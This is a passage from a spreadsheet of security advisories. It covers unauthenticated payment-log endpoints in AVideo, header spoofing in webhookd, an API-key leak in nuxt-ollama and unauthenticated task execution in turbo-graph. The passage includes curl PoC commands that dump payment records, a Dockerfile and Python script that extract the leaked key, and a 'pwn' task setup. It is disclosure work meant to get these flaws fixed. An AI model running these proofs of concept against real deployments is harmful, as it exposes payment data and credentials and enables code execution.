Multiple payment plugin `list.json.php` endpoints lack authentication and authorization checks, allowing unauthenticated attackers to retrieve all payment transaction records including PayPal billing agreement IDs, Express Checkout tokens, Authorize.Net webhook payloads with transaction details, and Bitcoin payment records. This is the same class of vulnerability fixed in the Scheduler plugin (GHSA-j724-5c6c-68g5 / commit 83390ab1f) but the fix was not applied to the remaining 21 affected endpoints.
## Details
The AVideo ObjectYPT admin CRUD pattern generates four endpoints per database table: `add.json.php`, `delete.json.php`, `list.json.php`, and an `index.php` page. In the payment plugins, `add.json.php` and `delete.json.php` correctly check `User::isAdmin()` before proceeding, but the `list.json.php` endpoints have no authorization check whatsoever.
**PayPalYPT_log list endpoint** (`plugin/PayPalYPT/View/PayPalYPT_log/list.json.php:1-10`):
```php
&lt;?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/PayPalYPT/Objects/PayPalYPT_log.php';
header('Content-Type: application/json');
$rows = PayPalYPT_log::getAll();
$total = PayPalYPT_log::getTotal();
?&gt;
{"data": &lt;?php echo json_encode($rows); ?&gt;, ...}
```
No `User::isAdmin()` check. The `getAll()` method (inherited from `ObjectYPT`) executes `SELECT * FROM PayPalYPT_log` returning all records.
**Contrast with the sibling add endpoint** (`plugin/PayPalYPT/View/PayPalYPT_log/add.json.php:13-16`):
```php
if (!User::isAdmin()) {
    $obj-&gt;msg = "You can't do this";
    die(json_encode($obj));
}
```
The `configuration.php` bootstrap file performs no global authentication gating — it initializes the application framework but does not enforce auth. No `.htaccess` rules restrict access to plugin View directories.
**Data model** (`plugin/PayPalYPT/Objects/PayPalYPT_log.php`): Each record contains `agreement_id`, `users_id`, `json` (full PayPal API response), `recurring_payment_id`, `value` (payment amount), and `token` (PayPal Express Checkout token).
The identical pattern exists in:
- `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php` — full Authorize.Net webhook payloads
- `plugin/BTCPayments/View/Btc_payments/list.json.php` — Bitcoin transaction identifiers and amounts
This was the exact same vulnerability class patched in commit 83390ab1f for the Scheduler plugin (GHSA-j724-5c6c-68g5), but the fix was only applied to the 3 Scheduler endpoints. A total of 21 `list.json.php` endpoints across the codebase remain unprotected.
## PoC
**Step 1 — Dump PayPal transaction logs (unauthenticated):**
```bash
curl -s 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php'
```
Returns all PayPal transaction records including agreement IDs, tokens, payment amounts, user IDs, and full PayPal API JSON responses.
**Step 2 — Dump Authorize.Net webhook logs (unauthenticated):**
```bash
curl -s 'https://target.com/plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php'
```
Returns all Authorize.Net webhook payloads including transaction IDs, event types, and payment details.
**Step 3 — Dump Bitcoin payment records (unauthenticated):**
```bash
curl -s 'https://target.com/plugin/BTCPayments/View/Btc_payments/list.json.php'
```
Returns all Bitcoin transaction identifiers, BTC amounts, and store identifiers.
**Step 4 — Confirm sibling endpoints ARE protected:**
```bash
curl -s -X POST 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/add.json.php'
# Returns: {"error":true,"msg":"You can't do this"}
```
## Impact
- **Financial data exposure:** Unauthenticated attackers can retrieve all payment transaction records across PayPal, Authorize.Net, and Bitcoin payment providers.
- **Token leakage:** PayPal Express Checkout tokens and billing agreement IDs are exposed, potentially enabling payment manipulation or account correlation.
- **PII leakage:** Transaction records contain user ID mappings, payment amounts, and full API responses that may include payer email addresses and names.
- **Broad scope:** 21 total `list.json.php` endpoints lack auth, also exposing live streaming server infrastructure (`Live_servers`), user connection data, meeting participation logs, and AI transcription responses.
- **Zero interaction required:** No authentication, no user interaction — a single GET request dumps the entire table.
## Recommended Fix
Add `User::isAdmin()` checks to all unprotected `list.json.php` endpoints, matching the pattern used in the Scheduler fix (commit 83390ab1f). For each affected file, add immediately after the `require_once` and `header()` lines:
```php
if (!User::isAdmin()) {
    $obj = new stdClass();
    $obj-&gt;error = true;
    $obj-&gt;msg = "You can't do this";
    die(json_encode($obj));
}
```
The full list of files requiring this fix:
1. `plugin/PayPalYPT/View/PayPalYPT_log/list.json.php`
2. `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php`
3. `plugin/BTCPayments/View/Btc_payments/list.json.php`
4. `plugin/AI/View/Ai_responses/list.json.php`
5. `plugin/AI/View/Ai_metatags_responses/list.json.php`
6. `plugin/AI/View/Ai_transcribe_responses/list.json.php`
7. `plugin/Live/view/Live_servers/list.json.php`
8. `plugin/Live/view/Live_schedule/list.json.php`
9. `plugin/Live/view/Live_restreams_logs/list.json.php`
10. `plugin/SocialMediaPublisher/View/Publisher_schedule/list.json.php`
11. `plugin/SocialMediaPublisher/View/Publisher_social_medias/list.json.php`
12. `plugin/Meet/View/Meet_join_log/list.json.php`
13. `plugin/Meet/View/Meet_schedule_has_users_groups/list.json.php`
14. `plugin/PlayLists/View/Playlists_schedules/list.json.php`
15. `plugin/UserConnections/View/Users_connections/list.json.php`
16. `plugin/UserNotifications/View/User_notifications/list.json.php`
17. `plugin/VideosStatistics/View/Statistics/list.json.php`
18. `plugin/VideoTags/View/Tags_subscriptions/list.json.php`
19. `plugin/CustomizeUser/View/Categories_has_users_groups/list.json.php`
20. `plugin/CustomizeUser/View/Users_extra_info/list.json.php`
21. `plugin/ImageGallery/list.json.php`</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56341</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59157</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>go:github.com/ncarlier/webhookd</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>1.22.0</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr"/>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-807</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>## Description
Before 1.22, if the Basic Auth (`htpasswd`) middleware was not configured, all incoming HTTP headers were blindly forwarded to the webhook script execution environment as shell variables. While the Basic Auth middleware correctly strips the authentication header (`X-WebAuthn-User`) from the incoming request before conditionally re-injecting it on successful authentication, disabling Basic Auth left the system vulnerable if deployed behind an unhardened reverse proxy.
## Impact
If an upstream reverse proxy is not properly hardened to strip client-provided authentication headers, an attacker could manually supply these headers (e.g., `X-WebAuthn-User`). A webhook script relying on this forwarded header for privilege elevation or identity verification could therefore be exploited to bypass security controls and impersonate other users.
## Mitigation
The `WHD_ALLOWED_UPSTREAM_HEADERS` configuration setting has been introduced to enforce a strict allowlist of HTTP headers that can be converted into shell variables. 
Additionally, the default behavior has been changed to adhere to the principle of least privilege. It is no longer `*` (allow all). The default allowed headers are now restricted to standard operational headers:
`Accept,Content-Type,Content-Length,User-Agent,X-Forwarded-For`
Administrators relying on upstream authentication proxies must explicitly add their authentication headers (e.g., `WHD_ALLOWED_UPSTREAM_HEADERS="Accept,Content-Type,Content-Length,User-Agent,X-Forwarded-For,x-webauthn-user"`) to ensure they are passed to the scripts securely.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59157</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59158</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt-ollama</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>1.3.1</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr"/>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>## Public Runtime Config Exposes Ollama API Key to Browser Clients
### Summary
`nuxt-ollama@1.2.26` unconditionally merges all module options — including `api_key` — into Nuxt's **public** runtime config (`runtimeConfig.public.ollama`). Nuxt serializes `runtimeConfig.public` into the SSR HTML response inside a `&lt;script&gt;` payload block (`window.__NUXT__`), making the API key visible in plaintext to any unauthenticated HTTP client that fetches the page. An attacker with no credentials can steal the Ollama cloud API key with a single HTTP GET request, then use it to make arbitrary requests to the Ollama API at the operator's expense.
### Details
The vulnerability is a design flaw in `src/module.ts`. During Nuxt module setup, the entire `_options` object — which contains `api_key` when configured for cloud Ollama as documented in `README.md:71-80` — is merged into the **public** runtime config namespace:
```ts
// src/module.ts:35-36
const currentConfig = (runtimeConfig.public.ollama ?? {}) as OllamaOptions
runtimeConfig.public.ollama = defu(currentConfig, _options)
```
Nuxt's SSR pipeline serializes `runtimeConfig.public` and embeds it in every server-rendered HTML page for client-side hydration. This results in the `api_key` appearing verbatim in the `window.__NUXT__` script block:
```html
&lt;script&gt;
window.__NUXT__={};
window.__NUXT__.config={
  public:{
    ollama:{
      protocol:"https",
      host:"api.ollama.com",
      port:"",
      proxy:false,
      api_key:"LEAKED_TEST_KEY_123"  // ← secret exposed to browser
    }
  }
}
&lt;/script&gt;
```
The browser-side composable (`src/runtime/composables/useOllama.ts`) then reads this value and sends it as an `Authorization: Bearer` header in client-side Ollama API calls:
```ts
// src/runtime/composables/useOllama.ts:6-10
const options: ModuleOptions = useRuntimeConfig().public.ollama as ModuleOptions
if (options.api_key) {
  headers.Authorization = `Bearer ${options.api_key}`
}
return new Ollama({ host, proxy: options.proxy, headers })
```
The complete data flow from source to sink:
1. `README.md:71-80` — official documentation instructs users to set `ollama.api_key` for cloud Ollama models
2. `src/module.ts:35-36` — **source**: `api_key` is merged into `runtimeConfig.public.ollama`
3. Nuxt SSR runtime — `runtimeConfig.public` is serialized into HTML `__NUXT__` payload
4. `src/runtime/composables/useOllama.ts:6` — browser composable reads `useRuntimeConfig().public.ollama`
5. `src/runtime/composables/useOllama.ts:8-10` — **sink**: `options.api_key` becomes `headers.Authorization` in client-side HTTP request
The `api_key` value is never private (i.e., placed in `runtimeConfig.ollama`) and no sanitization removes it from the public namespace before serialization.
**Recommended remediation:** Move `api_key` to the private runtime config and remove it from the browser composable:
```diff
-    const currentConfig = (runtimeConfig.public.ollama ?? {}) as OllamaOptions
-    runtimeConfig.public.ollama = defu(currentConfig, _options)
+    const { api_key, ...publicOptions } = _options
+    const currentPublicConfig = (runtimeConfig.public.ollama ?? {}) as Omit&lt;OllamaOptions, 'api_key'&gt;
+    runtimeConfig.public.ollama = defu(currentPublicConfig, publicOptions)
+    const currentPrivateConfig = (runtimeConfig.ollama ?? {}) as Pick&lt;ModuleOptions, 'api_key'&gt;
+    runtimeConfig.ollama = defu(currentPrivateConfig, { api_key })
```
The `api_key` should then only be consumed in the server-side utility (`src/runtime/server/utils/useOllama.ts`) via `useRuntimeConfig().ollama.api_key`.
### PoC
**Prerequisites:** Docker, Python 3
**Step 1 — Build the vulnerable Nuxt app container**
```bash
docker build \
  -f /path/to/vuln-001/Dockerfile \
  -t nuxt-ollama-vuln-001 \
  /path/to/npmAI_735_thoda-dev__nuxt-ollama
```
The Dockerfile uses the nuxt-ollama source at commit `6989ea8` and injects the following `playground/nuxt.config.ts` — the exact cloud configuration pattern from `README.md:71-80`:
```ts
export default defineNuxtConfig({
  modules: ['../src/module'],
  compatibilityDate: '2025-10-29',
  devtools: { enabled: false },
  ollama: {
    protocol: 'https',
    host: 'api.ollama.com',
    api_key: 'LEAKED_TEST_KEY_123'   // sentinel key
  }
})
```
**Step 2 — Start the container**
```bash
docker run -d --name nuxt-ollama-poc-001 -p 3000:3000 nuxt-ollama-vuln-001
```
**Step 3 — Retrieve the API key with a single unauthenticated HTTP request**
```bash
curl -s http://127.0.0.1:3000/ | grep -o 'api_key":"[^"]*"'
# Expected: api_key":"LEAKED_TEST_KEY_123"
```
**Automated PoC script**
```bash
python3 /path/to/vuln-001/poc.py
```
**Expected output (confirmed in dynamic reproduction):**
```
window.__NUXT__.config={
  public:{
    ollama:{
      protocol:"https",
      host:"api.ollama.com",
      port:"",
      proxy:false,
      api_key:"LEAKED_TEST_KEY_123"
    }
  }
}
```
The sentinel key `LEAKED_TEST_KEY_123` appears in the HTML body of an unauthenticated HTTP GET response, confirming the leak.
### Impact
This is a **credentials exposure** vulnerability (CWE-522). Any unauthenticated party — including passive network observers, web crawlers, or anonymous visitors — who fetches the HTML page of an application using `nuxt-ollama` with a cloud `api_key` configured can extract the API key from the `__NUXT__` script payload.
**Who is impacted:**
- **Operators/developers** who follow the official documentation to configure `ollama.api_key` for cloud Ollama models. They are unaware that the key is being published to every visitor.
- **End-users** of applications built with this module are not directly at risk, but their requests may be intercepted or the service degraded if attackers exhaust rate limits or billing quotas on the stolen key.
**Potential consequences of key theft:**
- Unauthorized use of the Ollama cloud API at the operator's cost
- Rate-limit exhaustion or quota abuse
- Data exfiltration if the compromised key has read access to stored models or conversations
- Reputational damage and service disruption for the affected application
The vulnerability does not require any special conditions beyond the operator following the documented configuration; no user interaction or prior authentication is needed by the attacker.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# syntax=docker/dockerfile:1
# VULN-001 PoC: nuxt-ollama@1.2.26 — Public Runtime Config Exposes Ollama API Key
# CWE-522: Insufficiently Protected Credentials
# CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)
#
# Vulnerability mechanism:
#   src/module.ts:36 — runtimeConfig.public.ollama = defu(currentConfig, _options)
#   This places api_key into Nuxt's PUBLIC runtime config, which Nuxt serializes
#   into the SSR HTML response (__NUXT__ / __NUXT_DATA__ payload).
#   Any unauthenticated HTTP client reading the page HTML sees the API key in plaintext.
FROM node:20-alpine
# Install pnpm matching the repo's packageManager field (pnpm@10.33.4)
RUN npm install -g pnpm@10.33.4
WORKDIR /app
# Copy the nuxt-ollama source repository
COPY repo/ ./
# Install all project dependencies.
# .npmrc already sets: shamefully-hoist=true, strict-peer-dependencies=false
RUN pnpm install --frozen-lockfile
# Override playground/nuxt.config.ts: inject a sentinel api_key to simulate
# a real-world cloud Ollama deployment as documented in README.md:71-80.
# This is the exact vulnerable configuration pattern described in the docs.
RUN cat &gt; playground/nuxt.config.ts &lt;&lt; 'EOF'
export default defineNuxtConfig({
  modules: ['../src/module'],
  compatibilityDate: '2025-10-29',
  devtools: { enabled: false },
  ollama: {
    protocol: 'https',
    host: 'api.ollama.com',
    api_key: 'LEAKED_TEST_KEY_123'
  }
})
EOF
# Replace app.vue with a minimal template that does NOT make Ollama API calls.
# The api_key leak occurs in the Nuxt SSR payload, not in the visible template.
# The original playground app.vue calls useFetch('/api/ollama') which requires
# a live Ollama server; replacing it keeps this PoC self-contained.
RUN cat &gt; playground/app.vue &lt;&lt; 'EOF'
&lt;template&gt;
  &lt;div&gt;nuxt-ollama VULN-001 PoC — check Nuxt SSR payload for api_key&lt;/div&gt;
&lt;/template&gt;
EOF
# Build the playground in production SSR mode.
# During the module setup() call, src/module.ts:36 merges all _options (including
# api_key) into runtimeConfig.public.ollama. At request time, Nuxt serializes
# runtimeConfig.public into the HTML response for client-side hydration.
RUN pnpm exec nuxi build playground
EXPOSE 3000
ENV HOST=0.0.0.0
ENV PORT=3000
ENV NITRO_HOST=0.0.0.0
ENV NITRO_PORT=3000
CMD ["node", "/app/playground/.output/server/index.mjs"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
VULN-001 Proof of Concept
Package : nuxt-ollama@1.2.26 (thoda-dev/nuxt-ollama, commit 6989ea8)
Title   : Public Runtime Config Exposes Ollama API Key to Browser Clients
CWE     : CWE-522 - Insufficiently Protected Credentials
CVSS    : 7.5 High  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack summary
--------------
When a Nuxt app installs nuxt-ollama and sets ollama.api_key (per README.md:71-80
for cloud Ollama), the module's setup() function in src/module.ts:36 merges the
entire _options object—api_key included—into runtimeConfig.public.ollama.
Nuxt's SSR pipeline serialises runtimeConfig.public for client-side hydration and
embeds it in the HTML response inside a &lt;script&gt; payload block (__NUXT__ /
__NUXT_DATA__).  Any unauthenticated HTTP GET request to the home page therefore
returns the api_key in plain text, with no authentication required.
This script:
  1. Builds a Docker image from the nuxt-ollama source with a sentinel api_key.
  2. Starts the image as a local container.
  3. Fetches http://127.0.0.1:3000/ and searches for the sentinel key.
  4. Prints an evidence excerpt and writes phase2_result.json.
"""
import json
import os
import subprocess
import sys
import time
import urllib.request
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
TARGET_KEY      = "LEAKED_TEST_KEY_123"
IMAGE_NAME      = "nuxt-ollama-vuln-001"
CONTAINER_NAME  = "nuxt-ollama-poc-001"
HOST            = "127.0.0.1"
PORT            = 3000
URL             = f"http://{HOST}:{PORT}/"
SCRIPT_DIR  = os.path.dirname(os.path.abspath(__file__))
PARENT_DIR  = os.path.dirname(SCRIPT_DIR)       # build context (contains repo/)
DOCKERFILE  = os.path.join(SCRIPT_DIR, "Dockerfile")
RESULT_FILE = os.path.join(SCRIPT_DIR, "phase2_result.json")
BUILD_CMD = f"docker build -f {DOCKERFILE} -t {IMAGE_NAME} {PARENT_DIR}"
RUN_CMD   = (
    f"docker run -d --name {CONTAINER_NAME} "
    f"-p {PORT}:{PORT} {IMAGE_NAME}"
)
POC_CMD   = f"python3 {os.path.join(SCRIPT_DIR, 'poc.py')}"
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def run_cmd(cmd_list, check=True, capture=False):
    """Execute a command, printing it first; return CompletedProcess."""
    print(f"[cmd] {' '.join(cmd_list)}", flush=True)
    return subprocess.run(
        cmd_list,
        check=check,
        capture_output=capture,
        text=bool(capture),
    )
def cleanup_container():
    """Remove the PoC container if it already exists."""
    subprocess.run(["docker", "rm", "-f", CONTAINER_NAME], capture_output=True)
def wait_for_server(url, timeout=180, interval=5):
    """Poll url until it returns a non-5xx response or the timeout expires."""
    print(f"[*] Waiting for server at {url}  (timeout={timeout}s)", flush=True)
    deadline = time.time() + timeout
    while time.time() &lt; deadline:
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                if resp.status &lt; 500:
                    print(f"[+] Server up — HTTP {resp.status}", flush=True)
                    return True
        except Exception:
            pass
        time.sleep(interval)
    return False
def save_result(data):
    """Write phase2_result.json and echo its path."""
    with open(RESULT_FILE, "w", encoding="utf-8") as fh:
        json.dump(data, fh, ensure_ascii=False, indent=2)
    print(f"\n[*] Result saved to {RESULT_FILE}", flush=True)
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main():
    print("=" * 66)
    print("VULN-001 PoC — nuxt-ollama@1.2.26 API Key Leak via Nuxt SSR Payload")
    print("=" * 66, flush=True)
    cleanup_container()
    # ------------------------------------------------------------------
    # Step 1 — Build Docker image
    # ------------------------------------------------------------------
    print("\n[STEP 1] Building Docker image (may take several minutes) ...", flush=True)
    build_rc = run_cmd(
        ["docker", "build", "-f", DOCKERFILE, "-t", IMAGE_NAME, PARENT_DIR],
        check=False,
    ).returncode
    if build_rc != 0:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        "Docker 이미지 빌드 실패. docker build 로그를 확인하세요.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      f"docker build exited with returncode={build_rc}",
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        sys.exit(1)
    print("[+] Image built successfully.", flush=True)
    # ------------------------------------------------------------------
    # Step 2 — Start the container
    # ------------------------------------------------------------------
    print("\n[STEP 2] Starting container ...", flush=True)
    run_rc = run_cmd(
        ["docker", "run", "-d",
         "--name", CONTAINER_NAME,
         "-p", f"{PORT}:{PORT}",
         IMAGE_NAME],
        check=False,
    ).returncode
    if run_rc != 0:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        "Docker 컨테이너 실행 실패.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      f"docker run exited with returncode={run_rc}",
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        sys.exit(1)
    # ------------------------------------------------------------------
    # Step 3 — Wait for Nuxt SSR server
    # ------------------------------------------------------------------
    print("\n[STEP 3] Waiting for Nuxt SSR server ...", flush=True)
    if not wait_for_server(URL, timeout=180):
        logs = subprocess.run(
            ["docker", "logs", CONTAINER_NAME],
            capture_output=True, text=True,
        )
        log_snippet = (logs.stdout + logs.stderr)[-2000:]
        print("[!] Server did not respond within timeout. Container logs:\n", log_snippet)
        save_result({
            "passed":        False,
            "verdict":       "INCOMPLETE",
            "reason":        "Nuxt SSR 서버가 180초 이내에 응답하지 않음. 컨테이너 로그 확인 필요.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      log_snippet,
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
    # ------------------------------------------------------------------
    # Step 4 — Fetch the rendered HTML page
    # ------------------------------------------------------------------
    print(f"\n[STEP 4] GET {URL} ...", flush=True)
    try:
        with urllib.request.urlopen(URL, timeout=15) as resp:
            html = resp.read().decode("utf-8", errors="replace")
    except Exception as exc:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        f"HTTP 요청 실패: {exc}",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      str(exc),
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
    print(f"[+] Received {len(html)} bytes.", flush=True)
    # ------------------------------------------------------------------
    # Step 5 — Verify TARGET_KEY is present in the HTTP response body
    # ------------------------------------------------------------------
    print(f"\n[STEP 5] Searching for '{TARGET_KEY}' in response ...", flush=True)
    if TARGET_KEY in html:
        idx   = html.index(TARGET_KEY)
        start = max(0, idx - 200)
        end   = min(len(html), idx + len(TARGET_KEY) + 200)
        excerpt = html[start:end].strip()
        print(f"\n{'='*66}")
        print(f"[PASS]  VULNERABILITY CONFIRMED")
        print(f"'{TARGET_KEY}' is present in the unauthenticated HTTP response.")
        print(f"{'='*66}")
        print(f"Evidence excerpt:\n\n{excerpt}\n")
        print(f"{'='*66}")
        save_result({
            "passed":        True,
            "verdict":       "PASS",
            "reason":        (
                "nuxt-ollama@1.2.26의 src/module.ts:36에서 api_key를 "
                "runtimeConfig.public.ollama에 병합함. Nuxt SSR이 해당 값을 HTML 응답의 "
                "__NUXT__ 페이로드에 직렬화하여, 인증 없는 HTTP GET 요청만으로 "
                "LEAKED_TEST_KEY_123이 응답 본문에서 노출됨이 실제 실행으로 확인됨."
            ),
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      excerpt,
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(0)
    else:
        snippet = html[:3000]
        print(f"[FAIL]  '{TARGET_KEY}' NOT found in the HTTP response body.")
        print("--- HTML (first 3000 chars) ---")
        print(snippet)
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        (
                f"'{TARGET_KEY}'가 HTTP 응답 본문에서 발견되지 않음. "
                "Nuxt 빌드 버전 또는 환경 차이로 인해 직렬화 형식이 다를 수 있음."
            ),
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      snippet[:1500],
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59158</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59160</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>npm:@yeger/turbo-graph</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr">
        <is>
          <t>2.8.12</t>
        </is>
      </c>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr"/>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>## Unauthenticated Network-Exposed Turborepo Task Execution via /api/run
### Summary
`@yeger/turbo-graph` starts its embedded Next.js server without binding to the loopback interface, causing it to listen on all network interfaces (`0.0.0.0:29312` by default). The `/api/run` HTTP endpoint exposed by this server performs no authentication, authorization, CSRF protection, or task allowlist check before executing attacker-supplied Turborepo task names via `spawn()`. Any adjacent-network attacker can send an unauthenticated GET request to trigger arbitrary tasks defined in the victim's repository, resulting in code execution, file modification, destructive build side effects, or deployment of attacker-chosen targets with the privileges of the developer's OS user.
### Details
Two independent flaws combine to create a remotely exploitable unauthenticated code execution vulnerability:
**Flaw 1 — Server bound to all interfaces (not loopback)**
`packages/turbo-graph/src/index.ts:44` calls `.listen(options.port, callback)` without passing a hostname argument. Although `const hostname = 'localhost'` is declared at line 19, it is used only for constructing the console log URL and is never passed to `listen()`. Node.js therefore defaults to binding on `0.0.0.0` (all IPv4 interfaces) and `::` (all IPv6 interfaces), making the server reachable from the local network segment.
```ts
// packages/turbo-graph/src/index.ts
19    const hostname = 'localhost'  // used only for console URL, not for listen()
...
44        .listen(options.port, () =&gt; {   // hostname argument missing → 0.0.0.0 bind
45          const url = `http://${hostname}:${options.port}`
```
**Flaw 2 — Unauthenticated `/api/run` task execution endpoint**
`packages/turbo-graph-ui/app/api/run/route.ts:156–177` defines `GET()`, which reads `tasks`, `filter`, and `force` from the request query string and passes them directly to `buildResponseFromArgs`, which appends them to a Turbo CLI argument array and calls `spawn()`. There is no authentication check, no session validation, no CSRF token, and no task allowlist anywhere in this handler.
```ts
// packages/turbo-graph-ui/app/api/run/route.ts
156  export function GET(req: NextRequest) {
157    const url = new URL(req.url)
159    const tasksParam = url.searchParams.getAll('tasks')   // attacker-controlled source
171    const filter = url.searchParams.get('filter') ?? undefined
176    return buildResponseFromArgs(tasks, filter, req.signal, { force })
// buildResponseFromArgs — packages/turbo-graph-ui/app/api/run/route.ts
20    const args: string[] = ['run', ...tasks]              // tasks inserted directly
25          args.push(`--filter=${trimmed}`)
31      args.push('--force')
34    const child = spawn(turboBin, args, { cwd: dir, env: { ...process.env, CI: 'true' } })
                                                            // ^ sink: arbitrary task execution
```
Because `spawn()` is invoked with an argument array (not a shell string), traditional shell metacharacter injection does not apply. However, this does not mitigate the vulnerability: any task name defined in `turbo.json` of the victim's repository can be selected and run without restriction.
### PoC
**Environment setup (victim machine):**
```bash
mkdir /tmp/tg-poc &amp;&amp; cd /tmp/tg-poc
cat &gt; package.json &lt;&lt;'JSON'
{
  "private": true,
  "scripts": {
    "pwn": "node -e \"require('fs').writeFileSync('/tmp/turbo-graph-poc', 'owned\\n')\""
  },
  "devDependencies": {
    "@yeger/turbo-graph": "2.8.8",
    "turbo": "^2.0.0"
  }
}
JSON
cat &gt; turbo.json &lt;&lt;'JSON'
{
  "tasks": {
    "pwn": { "cache": false }
  }
}
JSON
npm install
npx turbo-graph --port 29312
```
**Verify the server is bound to all interfaces (Flaw 1):**
```bash
